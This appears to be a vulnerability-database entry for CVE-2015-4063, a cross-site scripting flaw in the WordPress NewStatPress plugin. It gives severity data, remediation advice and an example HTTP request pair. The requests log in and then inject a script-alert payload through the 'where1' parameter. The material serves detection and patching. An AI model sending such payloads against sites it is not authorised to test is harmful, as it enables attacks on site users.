🔙 목록으로 돌아가기

CVE-2015-4063: NewStatPress <0.9.9 - Cross-Site Scripting

TitleNewStatPress <0.9.9 - Cross-Site Scripting
Authorr3Y3r53
SeverityLow
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
RemediationUpdate to plugin version 0.9.9 or latest.
CVSS Score3.5
EPSS Score0.03197
CVE IDCVE-2015-4063
CWE IDCWE-79
Tags cve2015 cve xss wordpress wp-plugin wp newstatpress packetstorm newstatpress_project vuln authenticated

🔍 Vulnerability Description

WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.

🌐 HTTP Request

POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

log=3FZKLW&pwd=0wOy4F&wp-submit=Log+In
GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-4063.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-4063.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A